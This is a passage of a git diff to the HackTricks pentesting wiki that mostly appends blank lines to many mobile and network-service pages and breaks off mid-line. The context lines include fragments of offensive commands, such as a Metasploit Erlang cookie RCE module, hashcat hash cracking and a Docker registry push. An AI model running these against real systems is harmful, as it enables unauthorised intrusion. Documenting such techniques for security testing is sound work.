a/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md +++ b/src/mobile-pentesting/android-app-pentesting/make-apk-accept-ca-certificate.md @@ -48,3 +48,4 @@ Finally, you need just to **sign the new application**. [Read this section of th {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md b/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md index 3f0e6982f..e9b9715db 100644 --- a/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md +++ b/src/mobile-pentesting/android-app-pentesting/manual-deobfuscation.md @@ -40,3 +40,4 @@ By executing the code in a controlled environment, dynamic analysis **allows for {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/react-native-application.md b/src/mobile-pentesting/android-app-pentesting/react-native-application.md index b2a09121e..50fbabed2 100644 --- a/src/mobile-pentesting/android-app-pentesting/react-native-application.md +++ b/src/mobile-pentesting/android-app-pentesting/react-native-application.md @@ -41,3 +41,4 @@ To search for sensitive credentials and endpoints, follow these steps: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md index b131a1358..b4cff1206 100644 --- a/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md +++ b/src/mobile-pentesting/android-app-pentesting/reversing-native-libraries.md @@ -46,3 +46,4 @@ Android apps can use native libraries, typically written in C or C++, for perfor {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/smali-changes.md b/src/mobile-pentesting/android-app-pentesting/smali-changes.md index ef9cdbc56..be382d814 100644 --- a/src/mobile-pentesting/android-app-pentesting/smali-changes.md +++ b/src/mobile-pentesting/android-app-pentesting/smali-changes.md @@ -190,3 +190,4 @@ invoke-virtual {v12}, Landroid/widget/Toast;->show()V {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md b/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md index f89d649e5..6e7e434b2 100644 --- a/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md +++ b/src/mobile-pentesting/android-app-pentesting/spoofing-your-location-in-play-store.md @@ -37,3 +37,4 @@ In situations where an application is restricted to certain countries, and you'r {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/tapjacking.md b/src/mobile-pentesting/android-app-pentesting/tapjacking.md index 8522896b9..be6ddc2c9 100644 --- a/src/mobile-pentesting/android-app-pentesting/tapjacking.md +++ b/src/mobile-pentesting/android-app-pentesting/tapjacking.md @@ -65,3 +65,4 @@ The mitigation is relatively simple as the developer may choose not to receive t {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-app-pentesting/webview-attacks.md b/src/mobile-pentesting/android-app-pentesting/webview-attacks.md index 086f9fd0d..db0eff0c1 100644 --- a/src/mobile-pentesting/android-app-pentesting/webview-attacks.md +++ b/src/mobile-pentesting/android-app-pentesting/webview-attacks.md @@ -147,3 +147,4 @@ xhr.send(null) {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/android-checklist.md b/src/mobile-pentesting/android-checklist.md index 42b510d11..fcaecdf69 100644 --- a/src/mobile-pentesting/android-checklist.md +++ b/src/mobile-pentesting/android-checklist.md @@ -61,3 +61,4 @@ {{#include ../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/cordova-apps.md b/src/mobile-pentesting/cordova-apps.md index 48d003bac..bc415c084 100644 --- a/src/mobile-pentesting/cordova-apps.md +++ b/src/mobile-pentesting/cordova-apps.md @@ -63,3 +63,4 @@ For those seeking to automate the cloning process, **[MobSecco](https://github.c {{#include ../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting-checklist.md b/src/mobile-pentesting/ios-pentesting-checklist.md index 1cc870503..b2017ce75 100644 --- a/src/mobile-pentesting/ios-pentesting-checklist.md +++ b/src/mobile-pentesting/ios-pentesting-checklist.md @@ -93,3 +93,4 @@ {{#include ../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/README.md b/src/mobile-pentesting/ios-pentesting/README.md index 4bb359bf1..adc51ae00 100644 --- a/src/mobile-pentesting/ios-pentesting/README.md +++ b/src/mobile-pentesting/ios-pentesting/README.md @@ -1180,3 +1180,4 @@ otool -L {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md b/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md index 94da4908c..1f18efd5f 100644 --- a/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md +++ b/src/mobile-pentesting/ios-pentesting/basic-ios-testing-operations.md @@ -203,3 +203,4 @@ To install iPad-specific applications on iPhone or iPod touch devices, the **UID {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md b/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md index 7d83528d7..101ecb5b7 100644 --- a/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md +++ b/src/mobile-pentesting/ios-pentesting/burp-configuration-for-ios.md @@ -90,3 +90,4 @@ Steps to configure Burp as proxy: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md b/src/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md index 4b9147656..53701574f 100644 --- a/src/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md +++ b/src/mobile-pentesting/ios-pentesting/extracting-entitlements-from-compiled-application.md @@ -47,3 +47,4 @@ Adjusting the `-A num, --after-context=num` flag allows for the display of more {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md b/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md index 39c30ad8d..ef7cae772 100644 --- a/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md +++ b/src/mobile-pentesting/ios-pentesting/frida-configuration-in-ios.md @@ -368,3 +368,4 @@ You can check the crashes in: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-app-extensions.md b/src/mobile-pentesting/ios-pentesting/ios-app-extensions.md index befbbe3d5..0bcddaf1c 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-app-extensions.md +++ b/src/mobile-pentesting/ios-pentesting/ios-app-extensions.md @@ -54,3 +54,4 @@ Tools like `frida-trace` can aid in understanding the underlying processes, espe {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-basics.md b/src/mobile-pentesting/ios-pentesting/ios-basics.md index c82413771..0f9a8ea0f 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-basics.md +++ b/src/mobile-pentesting/ios-pentesting/ios-basics.md @@ -138,3 +138,4 @@ This example indicates that the app is compatible with the armv7 instruction set {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md b/src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md index 5a3a48dca..4181e3535 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md +++ b/src/mobile-pentesting/ios-pentesting/ios-custom-uri-handlers-deeplinks-custom-schemes.md @@ -83,3 +83,4 @@ However, because the malicious app also registered it and because the used brows {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md b/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md index f21828cb6..22843155d 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md +++ b/src/mobile-pentesting/ios-pentesting/ios-hooking-with-objection.md @@ -261,3 +261,4 @@ Now that you have **enumerated the classes and modules** used by the application {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md b/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md index 4f4e85ef3..7c6d90a93 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md +++ b/src/mobile-pentesting/ios-pentesting/ios-protocol-handlers.md @@ -5,3 +5,4 @@ {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md b/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md index 7063a1485..f19c2ec49 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md +++ b/src/mobile-pentesting/ios-pentesting/ios-serialisation-and-encoding.md @@ -76,3 +76,4 @@ When serializing data, especially to the file system, it's essential to be vigil {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md b/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md index 2e10c501a..de666a268 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md +++ b/src/mobile-pentesting/ios-pentesting/ios-testing-environment.md @@ -130,3 +130,4 @@ You can try to avoid this detections using **objection's** `ios jailbreak disabl {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md b/src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md index d4b506866..420726a09 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md +++ b/src/mobile-pentesting/ios-pentesting/ios-uiactivity-sharing.md @@ -57,3 +57,4 @@ For **receiving items**, it involves: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md b/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md index 7a6fa8f1d..7227b86d9 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md +++ b/src/mobile-pentesting/ios-pentesting/ios-uipasteboard.md @@ -81,3 +81,4 @@ setInterval(function () { {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-universal-links.md b/src/mobile-pentesting/ios-pentesting/ios-universal-links.md index d1add822a..6e97b255a 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-universal-links.md +++ b/src/mobile-pentesting/ios-pentesting/ios-universal-links.md @@ -90,3 +90,4 @@ Through **diligent configuration and validation**, developers can ensure that un {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/ios-pentesting/ios-webviews.md b/src/mobile-pentesting/ios-pentesting/ios-webviews.md index d5eb3b776..76bc10420 100644 --- a/src/mobile-pentesting/ios-pentesting/ios-webviews.md +++ b/src/mobile-pentesting/ios-pentesting/ios-webviews.md @@ -310,3 +310,4 @@ However, be mindful of the limitations: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/mobile-pentesting/xamarin-apps.md b/src/mobile-pentesting/xamarin-apps.md index 82a62813b..a86b5e327 100644 --- a/src/mobile-pentesting/xamarin-apps.md +++ b/src/mobile-pentesting/xamarin-apps.md @@ -71,3 +71,4 @@ The tool [Uber APK Signer](https://github.com/patrickfav/uber-apk-signer) simpli {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md b/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md index 61f33bbd3..d6d83dc0b 100644 --- a/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md +++ b/src/network-services-pentesting/10000-network-data-management-protocol-ndmp.md @@ -26,3 +26,4 @@ nmap -n -sV --script "ndmp-fs-info or ndmp-version" -p 10000 #Both are defa {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/1026-pentesting-rusersd.md b/src/network-services-pentesting/1026-pentesting-rusersd.md index 866d26a7c..0f5cf7579 100644 --- a/src/network-services-pentesting/1026-pentesting-rusersd.md +++ b/src/network-services-pentesting/1026-pentesting-rusersd.md @@ -22,3 +22,4 @@ katykat potatohead:ttyp5 Sep 1 09:35 14 {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/1080-pentesting-socks.md b/src/network-services-pentesting/1080-pentesting-socks.md index ec89e3c42..d7ec28ee5 100644 --- a/src/network-services-pentesting/1080-pentesting-socks.md +++ b/src/network-services-pentesting/1080-pentesting-socks.md @@ -69,3 +69,4 @@ socks5 10.10.10.10 1080 username password {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/1099-pentesting-java-rmi.md b/src/network-services-pentesting/1099-pentesting-java-rmi.md index c649c6aeb..5783a81f2 100644 --- a/src/network-services-pentesting/1099-pentesting-java-rmi.md +++ b/src/network-services-pentesting/1099-pentesting-java-rmi.md @@ -316,3 +316,4 @@ Entry_1: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/11211-memcache/README.md b/src/network-services-pentesting/11211-memcache/README.md index 22db2c73d..26461905b 100644 --- a/src/network-services-pentesting/11211-memcache/README.md +++ b/src/network-services-pentesting/11211-memcache/README.md @@ -199,3 +199,4 @@ memcache-commands.md {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/11211-memcache/memcache-commands.md b/src/network-services-pentesting/11211-memcache/memcache-commands.md index 12da6df75..27339936b 100644 --- a/src/network-services-pentesting/11211-memcache/memcache-commands.md +++ b/src/network-services-pentesting/11211-memcache/memcache-commands.md @@ -133,3 +133,4 @@ This at least helps to see if any keys are used. To dump the key names from a PH {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/113-pentesting-ident.md b/src/network-services-pentesting/113-pentesting-ident.md index 2f25eb2aa..d0050da7a 100644 --- a/src/network-services-pentesting/113-pentesting-ident.md +++ b/src/network-services-pentesting/113-pentesting-ident.md @@ -96,3 +96,4 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/135-pentesting-msrpc.md b/src/network-services-pentesting/135-pentesting-msrpc.md index d211ea15d..8e58a3f7d 100644 --- a/src/network-services-pentesting/135-pentesting-msrpc.md +++ b/src/network-services-pentesting/135-pentesting-msrpc.md @@ -98,3 +98,4 @@ The **rpcdump.exe** from [rpctools](https://resources.oreilly.com/examples/97805 {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/137-138-139-pentesting-netbios.md b/src/network-services-pentesting/137-138-139-pentesting-netbios.md index db064538e..1d8db47da 100644 --- a/src/network-services-pentesting/137-138-139-pentesting-netbios.md +++ b/src/network-services-pentesting/137-138-139-pentesting-netbios.md @@ -85,3 +85,4 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/1414-pentesting-ibmmq.md b/src/network-services-pentesting/1414-pentesting-ibmmq.md index eda3c02d9..55be835d8 100644 --- a/src/network-services-pentesting/1414-pentesting-ibmmq.md +++ b/src/network-services-pentesting/1414-pentesting-ibmmq.md @@ -362,3 +362,4 @@ CONTAINER ID IMAGE COMMAND CRE - [IBM MQ documentation](https://www.ibm.com/docs/en/ibm-mq) + diff --git a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md index c4acb6618..ad4088b66 100644 --- a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md +++ b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener.md @@ -65,3 +65,4 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md index ac3779c29..4731a8f51 100644 --- a/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md +++ b/src/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/README.md @@ -65,3 +65,4 @@ Entry_2: {{#include ../../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md b/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md index 898f5f9d9..6abd5f6b9 100644 --- a/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md +++ b/src/network-services-pentesting/15672-pentesting-rabbitmq-management.md @@ -58,3 +58,4 @@ hashcat -m 1420 --hex-salt hash.txt wordlist {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/1723-pentesting-pptp.md b/src/network-services-pentesting/1723-pentesting-pptp.md index 309dd15cf..44c7e4e31 100644 --- a/src/network-services-pentesting/1723-pentesting-pptp.md +++ b/src/network-services-pentesting/1723-pentesting-pptp.md @@ -24,3 +24,4 @@ nmap –Pn -sSV -p1723 {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md b/src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md index d180769ee..cb62fee44 100644 --- a/src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md +++ b/src/network-services-pentesting/1883-pentesting-mqtt-mosquitto.md @@ -127,3 +127,4 @@ Every MQTT packet contains a fixed header (Figure 02).Figure 02: Fixed Header {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/2375-pentesting-docker.md b/src/network-services-pentesting/2375-pentesting-docker.md index 6a429603b..8fb58c914 100644 --- a/src/network-services-pentesting/2375-pentesting-docker.md +++ b/src/network-services-pentesting/2375-pentesting-docker.md @@ -337,3 +337,4 @@ You can use auditd to monitor docker. {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md b/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md index b537cdd0b..20f03d16e 100644 --- a/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md +++ b/src/network-services-pentesting/24007-24008-24009-49152-pentesting-glusterfs.md @@ -39,3 +39,4 @@ And storing them in your machine `/etc/ssl` or `/usr/lib/ssl` directory (if a di {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/27017-27018-mongodb.md b/src/network-services-pentesting/27017-27018-mongodb.md index 34baa1e9d..c989b3ee5 100644 --- a/src/network-services-pentesting/27017-27018-mongodb.md +++ b/src/network-services-pentesting/27017-27018-mongodb.md @@ -107,3 +107,4 @@ If you are root you can **modify** the **mongodb.conf** file so no credentials a {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/3128-pentesting-squid.md b/src/network-services-pentesting/3128-pentesting-squid.md index 9abb1a6de..d1bebeb63 100644 --- a/src/network-services-pentesting/3128-pentesting-squid.md +++ b/src/network-services-pentesting/3128-pentesting-squid.md @@ -43,3 +43,4 @@ python spose.py --proxy http://10.10.11.131:3128 --target 10.10.11.131 {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/3260-pentesting-iscsi.md b/src/network-services-pentesting/3260-pentesting-iscsi.md index 5ee667332..665d50adb 100644 --- a/src/network-services-pentesting/3260-pentesting-iscsi.md +++ b/src/network-services-pentesting/3260-pentesting-iscsi.md @@ -181,3 +181,4 @@ node.conn[0].iscsi.OFMarker = No {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/3299-pentesting-saprouter.md b/src/network-services-pentesting/3299-pentesting-saprouter.md index 7a799cb2a..4cafbd87b 100644 --- a/src/network-services-pentesting/3299-pentesting-saprouter.md +++ b/src/network-services-pentesting/3299-pentesting-saprouter.md @@ -80,3 +80,4 @@ For more detailed information on Metasploit modules and their usage, visit [Rapi {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/3632-pentesting-distcc.md b/src/network-services-pentesting/3632-pentesting-distcc.md index 438ccdbd1..36f188987 100644 --- a/src/network-services-pentesting/3632-pentesting-distcc.md +++ b/src/network-services-pentesting/3632-pentesting-distcc.md @@ -34,3 +34,4 @@ Post created by **Álex B (@r1p)** {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md b/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md index 57fa0be8d..80b9df44c 100644 --- a/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md +++ b/src/network-services-pentesting/3690-pentesting-subversion-svn-server.md @@ -29,3 +29,4 @@ svn up -r 2 #Go to revision 2 inside the checkout folder {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/3702-udp-pentesting-ws-discovery.md b/src/network-services-pentesting/3702-udp-pentesting-ws-discovery.md index 2dee9c428..76ab8024e 100644 --- a/src/network-services-pentesting/3702-udp-pentesting-ws-discovery.md +++ b/src/network-services-pentesting/3702-udp-pentesting-ws-discovery.md @@ -25,3 +25,4 @@ PORT STATE SERVICE {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/43-pentesting-whois.md b/src/network-services-pentesting/43-pentesting-whois.md index c912d0a23..fa1b5f89d 100644 --- a/src/network-services-pentesting/43-pentesting-whois.md +++ b/src/network-services-pentesting/43-pentesting-whois.md @@ -57,3 +57,4 @@ Entry_2: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md b/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md index 41f8f0fb4..3f9eac8b1 100644 --- a/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md +++ b/src/network-services-pentesting/4369-pentesting-erlang-port-mapper-daemon-epmd.md @@ -95,3 +95,4 @@ msf5> use exploit/multi/misc/erlang_cookie_rce {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/44134-pentesting-tiller-helm.md b/src/network-services-pentesting/44134-pentesting-tiller-helm.md index 7877c697b..5177d45f6 100644 --- a/src/network-services-pentesting/44134-pentesting-tiller-helm.md +++ b/src/network-services-pentesting/44134-pentesting-tiller-helm.md @@ -69,3 +69,4 @@ In [http://rui0.cn/archives/1573](http://rui0.cn/archives/1573) you have the **e {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/44818-ethernetip.md b/src/network-services-pentesting/44818-ethernetip.md index c97be0579..24b044a21 100644 --- a/src/network-services-pentesting/44818-ethernetip.md +++ b/src/network-services-pentesting/44818-ethernetip.md @@ -26,3 +26,4 @@ python3 -m cpppo.server.enip.list_services [--udp] [--broadcast] --list-identity {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/47808-udp-bacnet.md b/src/network-services-pentesting/47808-udp-bacnet.md index a085a0d96..07c70a0c0 100644 --- a/src/network-services-pentesting/47808-udp-bacnet.md +++ b/src/network-services-pentesting/47808-udp-bacnet.md @@ -53,3 +53,4 @@ This script does not attempt to join a BACnet network as a foreign device, it si {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/4786-cisco-smart-install.md b/src/network-services-pentesting/4786-cisco-smart-install.md index 1129bc65d..9eb8a7e6e 100644 --- a/src/network-services-pentesting/4786-cisco-smart-install.md +++ b/src/network-services-pentesting/4786-cisco-smart-install.md @@ -44,3 +44,4 @@ The switch configuration **10.10.100.10** will be in the **tftp/** folder {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/4840-pentesting-opc-ua.md b/src/network-services-pentesting/4840-pentesting-opc-ua.md index 5106a2b22..308909b5e 100644 --- a/src/network-services-pentesting/4840-pentesting-opc-ua.md +++ b/src/network-services-pentesting/4840-pentesting-opc-ua.md @@ -42,3 +42,4 @@ To get a clue of the device you have access to, read the "ServerStatus" node val {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/49-pentesting-tacacs+.md b/src/network-services-pentesting/49-pentesting-tacacs+.md index a93a36ebd..7125302c8 100644 --- a/src/network-services-pentesting/49-pentesting-tacacs+.md +++ b/src/network-services-pentesting/49-pentesting-tacacs+.md @@ -44,3 +44,4 @@ By gaining access to the control panel of network equipment using the obtained c {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5000-pentesting-docker-registry.md b/src/network-services-pentesting/5000-pentesting-docker-registry.md index d5d51cf05..1370449c7 100644 --- a/src/network-services-pentesting/5000-pentesting-docker-registry.md +++ b/src/network-services-pentesting/5000-pentesting-docker-registry.md @@ -317,3 +317,4 @@ docker push registry:5000/sshd-docker-cli #Push it {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md b/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md index c92d161af..7439e81be 100644 --- a/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md +++ b/src/network-services-pentesting/50030-50060-50070-50075-50090-pentesting-hadoop.md @@ -17,3 +17,4 @@ It's crucial to note that **Hadoop operates without authentication in its defaul {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/512-pentesting-rexec.md b/src/network-services-pentesting/512-pentesting-rexec.md index 8a73b9636..4eb74ab92 100644 --- a/src/network-services-pentesting/512-pentesting-rexec.md +++ b/src/network-services-pentesting/512-pentesting-rexec.md @@ -20,3 +20,4 @@ PORT STATE SERVICE {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md b/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md index 6dccba949..1e93a5890 100644 --- a/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md +++ b/src/network-services-pentesting/515-pentesting-line-printer-daemon-lpd.md @@ -32,3 +32,4 @@ For individuals interested in further exploring the realm of **printer hacking** {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md b/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md index df44e5811..b8710d1a9 100644 --- a/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md +++ b/src/network-services-pentesting/5353-udp-multicast-dns-mdns.md @@ -69,3 +69,4 @@ For more information check: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5439-pentesting-redshift.md b/src/network-services-pentesting/5439-pentesting-redshift.md index 3d745b42e..3dba7811d 100644 --- a/src/network-services-pentesting/5439-pentesting-redshift.md +++ b/src/network-services-pentesting/5439-pentesting-redshift.md @@ -13,3 +13,4 @@ For more information check: {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/554-8554-pentesting-rtsp.md b/src/network-services-pentesting/554-8554-pentesting-rtsp.md index 80b6b3075..91f2dd250 100644 --- a/src/network-services-pentesting/554-8554-pentesting-rtsp.md +++ b/src/network-services-pentesting/554-8554-pentesting-rtsp.md @@ -82,3 +82,4 @@ To bruteforce: [https://github.com/Tek-Security-Group/rtsp_authgrinder](https:// {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5555-android-debug-bridge.md b/src/network-services-pentesting/5555-android-debug-bridge.md index ff7325af2..d9ec8d475 100644 --- a/src/network-services-pentesting/5555-android-debug-bridge.md +++ b/src/network-services-pentesting/5555-android-debug-bridge.md @@ -51,3 +51,4 @@ You can use this trick to **retrieve sensitive information like chrome passwords {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5601-pentesting-kibana.md b/src/network-services-pentesting/5601-pentesting-kibana.md index 143a28bc4..eadd11568 100644 --- a/src/network-services-pentesting/5601-pentesting-kibana.md +++ b/src/network-services-pentesting/5601-pentesting-kibana.md @@ -27,3 +27,4 @@ In instances where SSL/TLS is not enabled, the potential for leaking sensitive i {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5671-5672-pentesting-amqp.md b/src/network-services-pentesting/5671-5672-pentesting-amqp.md index a9f1d5978..5dd35377b 100644 --- a/src/network-services-pentesting/5671-5672-pentesting-amqp.md +++ b/src/network-services-pentesting/5671-5672-pentesting-amqp.md @@ -79,3 +79,4 @@ In [https://www.rabbitmq.com/networking.html](https://www.rabbitmq.com/networkin {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/584-pentesting-afp.md b/src/network-services-pentesting/584-pentesting-afp.md index 09b7d929b..fd0878407 100644 --- a/src/network-services-pentesting/584-pentesting-afp.md +++ b/src/network-services-pentesting/584-pentesting-afp.md @@ -34,3 +34,4 @@ nmap -sV --script "afp-* and not dos and not brute" -p {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5984-pentesting-couchdb.md b/src/network-services-pentesting/5984-pentesting-couchdb.md index 0085ead85..7f6a10859 100644 --- a/src/network-services-pentesting/5984-pentesting-couchdb.md +++ b/src/network-services-pentesting/5984-pentesting-couchdb.md @@ -266,3 +266,4 @@ A [**summary**](https://github.com/carlospolop/hacktricks/pull/116/commits/e505c {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5985-5986-pentesting-omi.md b/src/network-services-pentesting/5985-5986-pentesting-omi.md index 34614b6f1..48a1fb55c 100644 --- a/src/network-services-pentesting/5985-5986-pentesting-omi.md +++ b/src/network-services-pentesting/5985-5986-pentesting-omi.md @@ -45,3 +45,4 @@ For a more information about this CVE **[check this](https://github.com/horizon3 {{#include ../banners/hacktricks-training.md}} + diff --git a/src/network-services-pentesting/5985-5986-pentesting-winrm.md b/src/network-services-pentesting/5985-5986-pentesting-winrm.md index c5b01873f..0eaad0bbd 100644 --- a/src/network-services-pentesting/5985-5986-pentesting-winrm.md +++ b/src/network-services-pentesting/5985-5986-pentesting-winrm.md @@ -304,3 +304,4 @@ Entry_2: {{#include 